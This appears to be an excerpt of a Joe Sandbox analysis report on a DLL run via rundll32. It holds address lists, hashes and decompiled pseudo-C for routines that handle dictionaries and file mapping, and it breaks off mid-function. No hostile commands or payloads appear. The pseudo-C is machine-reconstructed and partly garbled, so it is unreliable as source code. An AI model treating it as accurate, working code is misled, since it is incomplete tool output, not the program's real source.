0x1004c684
0x1004c688
0x1004c68f
0x1004c691
0x1004c691
0x1004c694
0x1004c698
0x1004c69c
0x1004c69e
0x1004c6a1
0x1004c6a4
0x1004c6a6
0x1004c6a8
0x1004c6ab
0x1004c6ae
0x1004c6b4
0x1004c6bb
0x1004c6bb
0x1004c68f
0x00000000
0x00000000
0x1001cb90
0x1001cb93
0x1001cb95
0x1001cb97
0x1001cb99
0x00000000
0x00000000
0x1001cb50
0x1001cb53
0x1001cb55
0x1001cb57
0x00000000
0x00000000
0x1001ccf0
0x1001ccf4
0x1001ccf8
0x1001ccfa
0x1001ccfd
0x00000000
0x00000000
0x1001cd10
0x1001cd14
0x1001cd18
0x1001cd1a
0x1001cd1d
0x00000000
0x00000000
0x1001cc40
0x1001cc44
0x1001cc48
0x1001cc4a
0x1001cc4d
0x1001cc54
0x1001cc56
0x1001cc59
0x1001cc60
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001cca0
0x1001cca4
0x1001cca8
0x1001ccaa
0x1001ccad
0x00000000
0x00000000
0x1001cbf8
0x1001cbfc
0x1001cc00
0x1001cc02
0x1001cc05
0x00000000
0x00000000
0x1001ccc0
0x1001ccc3
0x1001ccc7
0x1001ccc9
0x1001cccb
0x00000000
0x00000000
0x1001ccd8
0x1001ccdb
0x1001ccdd
0x1001cce1
0x1001cc10
0x1001cc12
0x1001cc14
0x1001cc18
0x1001cc1e
0x1001cc70
0x1001cc76
0x1001cdb8
0x1001cdbd
0x1001cdc1
0x1001cdc2
0x1001cdc4
0x1001cdc8
0x1001cdc8
0x1001cc82
0x1001cda0
0x1001cda3
0x1001cda6
0x1001cda9
0x1001cdac
0x1001cdac
0x1001cc8e
0x1001cc90
0x1001cc92
0x1001cc95
0x1001cc98
0x1001cc9b
0x1001cc9b
0x1001cc8e
0x1001cc20
0x1001cc20
0x1001cc20
0x1001cc20
0x1001cc24
0x1001cd30
0x1001cd34
0x1001cd39
0x1001cd3c
0x1001cd76
0x1001cdf0
0x1001cdf3
0x1001cdf4
0x1001cdf4
0x1001cd7e
0x1001cde0
0x1001cde5
0x1001cde8
0x1001cde8
0x1001cd86
0x1001cdd0
0x1001cdd6
0x1001cdd9
0x1001cdd9
0x1001cd88
0x1001cd8a
0x1001cd8c
0x1001cd8f
0x1001cd92
0x1001cd92
0x1001cd92
0x1001cd92
0x1001cd41
0x1001cd43
0x1001cd49
0x1001cd49
0x1001cd4f
0x1001cd51
0x1001cd56
0x1001cd56
0x1001cd5c
0x1001cd62
0x1001cd62
0x1001cd5c
0x1001cc2a
0x1001cc2e
0x1001cc32
0x1001cc36
0x1001cc3a
0x1001cc3d
0x00000000
0x00000000
0x1001cfa0
0x1001cfa4
0x1001cfa8
0x1001cfaa
0x1001cfad
0x00000000
0x00000000
0x1001cfc0
0x1001cfc4
0x1001cfc8
0x1001cfca
0x1001cfcd
0x00000000
0x00000000
0x1001cf60
0x1001cf64
0x1001cf68
0x1001cf6a
0x1001cf6d
0x00000000
0x00000000
0x1001cf80
0x1001cf84
0x1001cf88
0x1001cf8a
0x1001cf8d
0x00000000
0x00000000
0x1001ced8
0x1001cedc
0x1001cee0
0x1001cee2
0x1001cee5
0x00000000
0x00000000
0x1001cfe0
0x1001cfe3
0x1001cfe7
0x1001cfe9
0x1001cfeb
0x00000000
0x00000000
0x1001cff8
0x1001cffb
0x1001cffd
0x1001d001
0x1001cef0
0x1001cef0
0x1001cef4
0x1001cef8
0x1001cefd
0x1001cf01
0x1001cf05
0x1001cf08
0x1001cf0d
0x1001cf10
0x1001cf15
0x1001cf15
0x1001cf15
0x1001cf17
0x1001cf1b
0x1001cf24
0x1001cf26
0x1001cf2c
0x1001d016
0x1001d058
0x1001d05d
0x1001d060
0x1001d061
0x1001d065
0x1001d065
0x1001d01e
0x1001d040
0x1001d043
0x1001d046
0x1001d049
0x1001d04c
0x1001d04c
0x1001d026
0x1001d02c
0x1001d02e
0x1001d031
0x1001d034
0x1001d037
0x1001d037
0x1001d026
0x1001cf32
0x1001cf32
0x1001cf32
0x1001cf36
0x1001cf38
0x1001cf38
0x1001cf3d
0x1001cf44
0x1001cf4b
0x1001cf52
0x1001cf59
0x1001cf5f
0x00000000
0x00000000
0x1001c7fa
0x1001c7f8
0x00000000

APIs

mv_strcasecmp.F072 ref: 1001C7BE
mv_mallocz.F072 ref: 1001C7E7

Strings

MD5, xrefs: 1001C791

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_malloczmv_strcasecmp
String ID: MD5
API String ID: 1451953452-1168476579
Opcode ID: 05d541b0a02844c6fa927b2182f2bf38f1bce2312da876daaceceafae4a04c82
Instruction ID: 67cf48b984792008eb9918d7ca6f9d2bd109b0f8cd42104998243e9ea9d1147f
Opcode Fuzzy Hash: 05d541b0a02844c6fa927b2182f2bf38f1bce2312da876daaceceafae4a04c82
Instruction Fuzzy Hash: 2691D2B8909704DFC750DF68C58091ABBE0FF89354F14896EF9888B361E734D981EB56

Uniqueness

Uniqueness Score: -1.00%

Function 10011560 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 216
stringCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E10011560(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, signed int* _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v50;
				void* _v56;
				void* _v60;
				void* _v64;
				intOrPtr _v92;
				signed int _v96;
				signed int* _v100;
				signed int* _v104;
				signed int* _t89;
				signed int* _t98;
				signed int* _t99;
				signed int _t104;
				void* _t105;
				int _t109;
				int _t110;
				void* _t112;
				signed int _t116;
				signed int* _t121;
				signed int _t127;
				int _t129;
				signed int _t130;
				intOrPtr* _t133;
				signed int* _t134;
				void* _t136;
				signed int* _t140;
				signed int* _t142;
				int _t143;
				void* _t144;
				signed int* _t149;
				void* _t150;
				signed int* _t152;
				signed int _t153;
				int _t155;
				signed int _t156;
				void _t158;
				signed int** _t162;
				signed int** _t163;

				_v16 = __ebx;
				_v12 = __esi;
				_v104 = 0x16;
				_t149 =  &_v50;
				 *_t163 = _t149;
				_v92 = _a16;
				_v96 = _a12;
				_v100 = 0x100b4200;
				_v8 = __edi;
				_t140 = _a8;
				_v4 = __ebp;
				E10011040();
				_v60 = 0;
				_t121 =  *_a4;
				 *_t163 = _t149;
				_v56 = 0;
				_t89 = E100292E0(_t121, _t140, _t149, 0);
				_v56 = _t89;
				if(_t140 == 0) {
					_t150 = 0xffffffea;
					L24:
					if(_t121 == 0) {
						L16:
						 *_t163 = _v60;
						L100290D0();
						 *_t163 = _v56;
						L100290D0();
						L17:
						return _t150;
					}
					L15:
					if( *_t121 == 0) {
						 *_t163 =  &(_t121[1]);
						E100290E0();
						 *_t163 = _a4;
						E100290E0();
					}
					goto L16;
				}
				_t162 = 0;
				_t152 = _t89;
				if((_a20 & 0x00000040) == 0) {
					_v104 = _t140;
					_v100 = 0;
					 *_t163 = _t121;
					_v96 = _a20 & 0xfffffff7;
					_t162 = E100110D0();
				}
				if((_a20 & 0x00000004) == 0) {
					 *_t163 = _t140;
					_t98 = E100292E0(_t121, _t140, _t152, _t162);
					_v60 = _t98;
					_t142 = _t98;
					if(_t121 == 0) {
						L19:
						 *_t163 = 8;
						_t99 = E10029100();
						_t142 = _v60;
						_t121 = _t99;
						 *_a4 = _t121;
						if(_t121 == 0 || _t142 == 0) {
							_t150 = 0xfffffff4;
							goto L24;
						} else {
							L21:
							_t152 = _v56;
							L4:
							if(_t152 == 0) {
								L14:
								_t150 = 0xfffffff4;
								goto L15;
							}
							if(_t162 == 0) {
								_v100 = 8;
								_v104 =  *_t121 + 1;
								 *_t163 = _t121[1];
								_t104 = E10029010();
								_t153 = _t104;
								if(_t104 == 0) {
									goto L14;
								}
								_t121[1] = _t104;
								_t127 =  *_t121;
								L10:
								_t105 = _v56;
								if(_t105 == 0) {
									if(_t127 == 0) {
										 *_t163 =  &(_t121[1]);
										E100290E0();
										 *_t163 = _a4;
										E100290E0();
									}
									_t150 = 0;
									 *_t163 =  &_v60;
									E100290E0();
								} else {
									_t133 = _t153 + _t127 * 8;
									 *((intOrPtr*)(_t133 + 4)) = _t105;
									 *_t133 = _v60;
									_t150 = 0;
									 *_t121 = _t127 + 1;
								}
								goto L17;
							}
							if((_a20 & 0x00000010) != 0) {
								 *_t163 = _t142;
								_t150 = 0;
								L100290D0();
								 *_t163 = _v56;
								L100290D0();
								goto L17;
							}
							_t134 = _a4;
							 *_t163 = _t134;
							if((_a20 & 0x00000020) != 0) {
								_v64 = _t134;
								_t109 = strlen(??);
								 *_t163 = _t152;
								_t143 = _t109;
								_t110 = strlen(??);
								 *_t163 = _v64;
								_t155 = _t110;
								_t68 = _t110 + 1; // 0x1
								_v104 = _t143 + _t68;
								_t112 = L10028DA0();
								if(_t112 == 0) {
									goto L14;
								}
								_t70 = _t155 + 1; // 0x1
								_t129 = _t70;
								_t144 = _t143 + _t112;
								_t136 = _v56;
								if(_t129 >= 8) {
									if((_t144 & 0x00000001) != 0) {
										_t130 =  *_t136 & 0x000000ff;
										_t144 = _t144 + 1;
										_t136 = _t136 + 1;
										 *(_t144 - 1) = _t130;
										_t129 = _t155;
									}
									if((_t144 & 0x00000002) != 0) {
										_t156 =  *_t136 & 0x0000ffff;
										_t144 = _t144 + 2;
										_t136 = _t136 + 2;
										_t129 = _t129 - 2;
										 *(_t144 - 2) = _t156;
									}
									if((_t144 & 0x00000004) != 0) {
										_t158 =  *_t136;
										_t144 = _t144 + 4;
										_t136 = _t136 + 4;
										_t129 = _t129 - 4;
										 *(_t144 - 4) = _t158;
									}
								}
								_v64 = _t112;
								memcpy(_t144, _t136, _t129);
								_t163 =  &(_t163[3]);
								 *_t163 =  &_v56;
								E100290E0();
								_v56 = _v64;
								goto L9;
							} else {
								L100290D0();
								L9:
								 *_t163 =  *_t162;
								L100290D0();
								_t116 =  *_t121;
								_t153 = _t121[1];
								_t32 = _t116 - 1; // -1
								_t127 = _t32;
								 *_t121 = _t127;
								 *_t162 =  *(_t153 + _t127 * 8);
								_a4 =  *(_t153 + 4 + _t127 * 8);
								goto L10;
							}
						}
					}
					if(_t98 != 0) {
						goto L21;
					}
					goto L14;
				}
				_v60 = _t140;
				if(_t121 == 0) {
					goto L19;
				}
				goto L4;
			}

0x10011563
0x1001156b
0x10011578
0x1001157c
0x10011580
0x10011583
0x1001158c
0x10011590
0x10011594
0x10011598
0x1001159c
0x100115a2
0x100115ab
0x100115af
0x100115b3
0x100115b6
0x100115ba
0x100115c1
0x100115c5
0x10011758
0x1001175d
0x1001175f
0x10011699
0x1001169d
0x100116a0
0x100116a9
0x100116ac
0x100116b1
0x100116c6
0x100116c6
0x1001168f
0x10011693
0x10011773
0x10011776
0x1001177f
0x10011782
0x10011782
0x00000000
0x10011693
0x100115cb
0x100115cd
0x100115d7
0x100116d0
0x100116dd
0x100116e1
0x100116e7
0x100116f0
0x100116f0
0x100115e5
0x10011670
0x10011673
0x1001167a
0x1001167e
0x10011680
0x10011700
0x10011700
0x10011707
0x1001170c
0x10011710
0x10011718
0x1001171a
0x10011840
0x00000000
0x10011728
0x10011728
0x10011728
0x100115f7
0x100115f9
0x1001168a
0x1001168a
0x00000000
0x1001168a
0x10011601
0x100117b5
0x100117bc
0x100117c3
0x100117c6
0x100117cd
0x100117cf
0x00000000
0x00000000
0x100117d5
0x100117d8
0x10011650
0x10011650
0x10011656
0x10011792
0x10011853
0x10011856
0x1001185f
0x10011862
0x10011862
0x1001179c
0x1001179e
0x100117a1
0x1001165c
0x1001165c
0x10011664
0x10011667
0x10011669
0x1001166b
0x1001166b
0x00000000
0x10011656
0x1001160f
0x10011738
0x1001173b
0x1001173d
0x10011746
0x10011749
0x00000000
0x10011749
0x10011615
0x10011620
0x10011623
0x100117e0
0x100117e4
0x100117e9
0x100117ec
0x100117ee
0x100117f7
0x100117fa
0x100117fc
0x10011800
0x10011804
0x1001180b
0x00000000
0x00000000
0x10011811
0x10011811
0x10011814
0x10011816
0x1001181d
0x10011876
0x10011898
0x1001189b
0x1001189c
0x1001189d
0x100118a0
0x100118a0
0x1001187e
0x100118a4
0x100118a7
0x100118aa
0x100118ad
0x100118b0
0x100118b0
0x10011886
0x10011888
0x1001188a
0x1001188d
0x10011890
0x10011893
0x10011893
0x10011886
0x1001181f
0x10011825
0x10011825
0x1001182b
0x1001182e
0x10011837
0x00000000
0x10011629
0x10011629
0x1001162e
0x10011631
0x10011634
0x10011639
0x1001163b
0x1001163e
0x1001163e
0x10011641
0x1001164a
0x1001164d
0x00000000
0x1001164d
0x10011623
0x1001171a
0x10011684
0x00000000
0x00000000
0x00000000
0x10011684
0x100115eb
0x100115f1
0x00000000
0x00000000
0x00000000

APIs

mv_strdup.F072 ref: 100115BA

Part of subcall function 100292E0: strlen.MSVCRT ref: 100292FE
Part of subcall function 100292E0: _aligned_realloc.MSVCRT ref: 10029325

mv_strdup.F072 ref: 10011673
mv_dict_get.F072 ref: 100116EB
mv_mallocz.F072 ref: 10011707
mv_freep.F072 ref: 100117A1
mv_realloc_array.F072 ref: 100117C6
strlen.MSVCRT ref: 100117E4
strlen.MSVCRT ref: 100117EE
mv_realloc.F072 ref: 10011804
mv_freep.F072 ref: 1001182E

Strings

%lld, xrefs: 10011587
, xrefs: 10011618

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$mv_freepmv_strdup$_aligned_reallocmv_dict_getmv_malloczmv_reallocmv_realloc_array
String ID: $%lld
API String ID: 420417855-3617178099
Opcode ID: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
Instruction ID: 8f6e5ec8c3f0a619e422cb1a926671cc568e29337de09296a572835a12694a18
Opcode Fuzzy Hash: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
Instruction Fuzzy Hash: 539117B59097458FC754DF68C18066EBBE0FF88380F56892DED889B341DB74E880CB42

Uniqueness

Uniqueness Score: -1.00%

Function 100192E0 Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 150fileCOMMON

Download Yara Rule

APIs

mvpriv_open.F072 ref: 1001933F

Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
Part of subcall function 100195E0: mv_calloc.F072 ref: 1001964E
Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32 ref: 10019685
Part of subcall function 100195E0: mv_calloc.F072 ref: 100196D7
Part of subcall function 100195E0: mv_freep.F072 ref: 10019713
Part of subcall function 100195E0: wcslen.MSVCRT ref: 1001971F
Part of subcall function 100195E0: _wsopen.MSVCRT ref: 1001974B

_fstat64.MSVCRT ref: 10019366
_close.MSVCRT ref: 10019394
_get_osfhandle.MSVCRT ref: 100193C5
CreateFileMappingA.KERNEL32 ref: 100193ED
MapViewOfFile.KERNEL32 ref: 10019422
CloseHandle.KERNEL32 ref: 10019434
mv_log.F072 ref: 1001945D
_close.MSVCRT ref: 10019465
_errno.MSVCRT ref: 10019480
mv_strerror.F072 ref: 100194A1
mv_log.F072 ref: 100194C7
_errno.MSVCRT ref: 100194D8
mv_strerror.F072 ref: 100194FE
mv_log.F072 ref: 1001951B
_close.MSVCRT ref: 10019523
mv_log.F072 ref: 1001954F
_close.MSVCRT ref: 10019557

Strings

Error occurred in CreateFileMapping(), xrefs: 10019561
File size for file '%s' is too big, xrefs: 10019535
Error occurred in fstat(): %s, xrefs: 1001950B
Cannot read file '%s': %s, xrefs: 100194A6

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _closemv_log$ByteCharFileMultiWide_errnomv_callocmv_strerror$CloseCreateHandleMappingView_fstat64_get_osfhandle_wsopenmv_freepmvpriv_openwcslen
String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in fstat(): %s$File size for file '%s' is too big
API String ID: 2213036534-2445208470
Opcode ID: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
Instruction ID: a1ac4bca67f905ea7eb530c9fec20e9fe0d2cf07c5fae6ebec99be3d32fbbfc6
Opcode Fuzzy Hash: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
Instruction Fuzzy Hash: 8561BDB59097459FC310DF29C48429EBBE4FF88710F51892EE8D98B350EB78D9808F82

Uniqueness

Uniqueness Score: -1.00%

Function 10011210 Relevance: 30.2, APIs: 20, Instructions: 223
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E10011210(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int _a4, signed int _a8, void* _a12, signed int _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				void* _v36;
				int _v48;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _t94;
				signed int* _t95;
				signed int _t101;
				signed int _t102;
				signed int _t104;
				signed int _t106;
				int _t108;
				int _t109;
				int _t111;
				signed int* _t118;
				int _t122;
				signed int _t123;
				int _t126;
				signed int _t127;
				signed int* _t130;
				int _t133;
				signed int _t134;
				void _t136;
				signed int _t138;
				void* _t142;
				signed int _t146;
				void* _t147;
				signed int _t149;
				signed int _t150;
				int _t153;
				void* _t154;
				signed int* _t157;
				signed int* _t158;

				_v8 = __edi;
				_v16 = __ebx;
				_t138 = _a16;
				_v12 = __esi;
				_t146 = _a8;
				_v4 = __ebp;
				_t118 =  *_a4;
				_v36 = 0;
				_v32 = 0;
				if((_t138 & 0x00000008) == 0) {
					if(_a12 == 0) {
						goto L2;
					}
					 *_t158 = _a12;
					_v32 = E100292E0(_t118, _t138, _t146, __ebp);
					if(_t146 != 0) {
						goto L3;
					}
					goto L22;
				} else {
					_v32 = _a12;
					L2:
					if(_t146 == 0) {
						L22:
						_t147 = 0xffffffea;
						L23:
						if(_t118 == 0) {
							L10:
							 *_t158 = _v36;
							L100290D0();
							 *_t158 = _v32;
							L100290D0();
							L11:
							return _t147;
						}
						L9:
						if( *_t118 == 0) {
							 *_t158 =  &(_t118[1]);
							E100290E0();
							 *_t158 = _a4;
							E100290E0();
						}
						goto L10;
					}
					L3:
					_t157 = 0;
					if((_t138 & 0x00000040) == 0) {
						_v64 = _t138;
						_v68 = 0;
						_v72 = _t146;
						 *_t158 = _t118;
						_t157 = E100110D0();
					}
					if((_t138 & 0x00000004) == 0) {
						 *_t158 = _t146;
						_t94 = E100292E0(_t118, _t138, _t146, _t157);
						_v36 = _t94;
						_t149 = _t94;
						if(_t118 == 0) {
							goto L29;
						}
						if(_t94 == 0) {
							goto L8;
						}
						goto L6;
					} else {
						_v36 = _t146;
						if(_t118 == 0) {
							L29:
							 *_t158 = 8;
							_t95 = E10029100();
							_t149 = _v36;
							_t118 = _t95;
							 *_a4 = _t118;
							if(_t118 == 0 || _t149 == 0) {
								_t147 = 0xfffffff4;
								goto L23;
							} else {
								goto L6;
							}
						}
						L6:
						_t122 = _v32;
						if(_a12 == 0 || _t122 != 0) {
							if(_t157 == 0) {
								_t150 =  *_t118;
								if(_t122 == 0) {
									L37:
									if(_t150 == 0) {
										 *_t158 =  &(_t118[1]);
										E100290E0();
										 *_t158 = _a4;
										E100290E0();
									}
									_t147 = 0;
									 *_t158 =  &_v36;
									E100290E0();
									goto L11;
								}
								_v68 = 8;
								_v72 = _t150 + 1;
								 *_t158 = _t118[1];
								_t101 = E10029010();
								_t123 = _t101;
								if(_t101 == 0) {
									goto L8;
								}
								_t118[1] = _t101;
								_t150 =  *_t118;
								L18:
								_t102 = _v32;
								if(_t102 == 0) {
									goto L37;
								}
								_t130 = _t123 + _t150 * 8;
								_t130[1] = _t102;
								 *_t130 = _v36;
								 *_t118 = _t150 + 1;
								_t147 = 0;
								goto L11;
							}
							if((_t138 & 0x00000010) != 0) {
								 *_t158 = _t149;
								_t147 = 0;
								L100290D0();
								 *_t158 = _v32;
								L100290D0();
								goto L11;
							}
							_t104 = _a4;
							if(_t122 == 0 || (_t138 & 0x00000020) == 0) {
								 *_t158 = _t104;
								L100290D0();
								goto L17;
							} else {
								 *_t158 = _t104;
								_v48 = _t122;
								_t108 = strlen(??);
								 *_t158 = _v48;
								_t153 = _t108;
								_t109 = strlen(??);
								 *_t158 = _t104;
								_v48 = _t109;
								_t63 = _t109 + 1; // 0x1
								_v72 = _t153 + _t63;
								_t111 = L10028DA0();
								if(_t111 == 0) {
									goto L8;
								}
								_t133 = _v48;
								_t142 = _t111 + _t153;
								_t154 = _v32;
								_t126 = _t133 + 1;
								if(_t126 >= 8) {
									if((_t142 & 0x00000001) != 0) {
										_t127 =  *_t154 & 0x000000ff;
										_t142 = _t142 + 1;
										_t154 = _t154 + 1;
										 *(_t142 - 1) = _t127;
										_t126 = _t133;
									}
									if((_t142 & 0x00000002) != 0) {
										_t134 =  *_t154 & 0x0000ffff;
										_t142 = _t142 + 2;
										_t154 = _t154 + 2;
										_t126 = _t126 - 2;
										 *(_t142 - 2) = _t134;
									}
									if((_t142 & 0x00000004) != 0) {
										_t136 =  *_t154;
										_t142 = _t142 + 4;
										_t154 = _t154 + 4;
										_t126 = _t126 - 4;
										 *(_t142 - 4) = _t136;
									}
								}
								_v48 = _t111;
								memcpy(_t142, _t154, _t126);
								_t158 =  &(_t158[3]);
								 *_t158 =  &_v32;
								E100290E0();
								_v32 = _v48;
								L17:
								 *_t158 =  *_t157;
								L100290D0();
								_t106 =  *_t118;
								_t123 = _t118[1];
								_t31 = _t106 - 1; // -1
								_t150 = _t31;
								 *_t118 = _t150;
								 *_t157 =  *(_t123 + _t150 * 8);
								_a4 =  *(_t123 + 4 + _t150 * 8);
								goto L18;
							}
						} else {
							L8:
							_t147 = 0xfffffff4;
							goto L9;
						}
					}
				}
			}

0x10011213
0x1001121b
0x1001121f
0x10011223
0x10011227
0x1001122b
0x1001122f
0x10011233
0x1001123f
0x10011243
0x10011346
0x00000000
0x00000000
0x10011350
0x1001135a
0x1001135e
0x00000000
0x00000000
0x00000000
0x10011249
0x1001124d
0x10011251
0x10011253
0x10011364
0x10011364
0x10011369
0x1001136b
0x1001129e
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x100112b6
0x100112cb
0x100112cb
0x10011294
0x10011298
0x10011413
0x10011416
0x1001141f
0x10011422
0x10011422
0x00000000
0x10011298
0x10011259
0x10011259
0x10011261
0x100113a0
0x100113a6
0x100113aa
0x100113ae
0x100113b6
0x100113b6
0x1001126d
0x10011380
0x10011383
0x1001138a
0x1001138e
0x10011390
0x00000000
0x00000000
0x10011394
0x00000000
0x00000000
0x00000000
0x10011273
0x10011273
0x10011279
0x100113c0
0x100113c0
0x100113c7
0x100113cc
0x100113d0
0x100113d8
0x100113da
0x100113e4
0x00000000
0x00000000
0x00000000
0x00000000
0x100113da
0x1001127f
0x10011283
0x10011289
0x100112d2
0x10011432
0x10011434
0x10011468
0x1001146a
0x100114fb
0x100114fe
0x10011507
0x1001150a
0x1001150a
0x10011474
0x10011476
0x10011479
0x00000000
0x10011479
0x1001143c
0x10011440
0x10011447
0x1001144a
0x10011451
0x10011453
0x00000000
0x00000000
0x10011459
0x1001145c
0x1001131e
0x1001131e
0x10011324
0x00000000
0x00000000
0x1001132a
0x10011332
0x10011335
0x10011337
0x10011339
0x00000000
0x10011339
0x100112de
0x100113f0
0x100113f3
0x100113f5
0x100113fe
0x10011401
0x00000000
0x10011401
0x100112e6
0x100112e9
0x100112f4
0x100112f7
0x00000000
0x10011488
0x10011488
0x1001148d
0x10011491
0x1001149a
0x1001149d
0x1001149f
0x100114a4
0x100114a9
0x100114ad
0x100114b1
0x100114b5
0x100114bc
0x00000000
0x00000000
0x100114c2
0x100114c6
0x100114c9
0x100114cd
0x100114d3
0x1001151e
0x10011540
0x10011543
0x10011544
0x10011545
0x10011548
0x10011548
0x10011526
0x1001154c
0x1001154f
0x10011552
0x10011555
0x10011558
0x10011558
0x1001152e
0x10011530
0x10011532
0x10011535
0x10011538
0x1001153b
0x1001153b
0x1001152e
0x100114d5
0x100114dd
0x100114dd
0x100114df
0x100114e2
0x100114eb
0x100112fc
0x100112ff
0x10011302
0x10011307
0x10011309
0x1001130c
0x1001130c
0x1001130f
0x10011318
0x1001131b
0x00000000
0x1001131b
0x1001128f
0x1001128f
0x1001128f
0x00000000
0x1001128f
0x10011289
0x1001126d

APIs

mv_strdup.F072 ref: 10011353
mv_strdup.F072 ref: 10011383
mv_dict_get.F072 ref: 100113B1
mv_mallocz.F072 ref: 100113C7

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strdup$mv_dict_getmv_mallocz
String ID:
API String ID: 3834523185-0
Opcode ID: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
Instruction ID: 56232f5dd71c1c11c53de360d97ca929451fd6b060f0d926ddb83f3af19d46ac
Opcode Fuzzy Hash: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
Instruction Fuzzy Hash: 2E9127B5A087158FC754DF68C08065EBBE1EF98790F52892DED999B340E770E981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1001A6C0 Relevance: 28.8, APIs: 19, Instructions: 325
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1001A6C0(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t251;
				signed int _t259;
				void* _t262;
				signed int* _t263;
				void* _t264;
				void* _t269;
				signed int _t275;
				void* _t278;
				signed int _t290;
				signed int _t291;
				void _t293;
				void* _t294;
				signed int _t307;
				signed int _t308;
				int _t311;
				signed int _t315;
				int _t321;
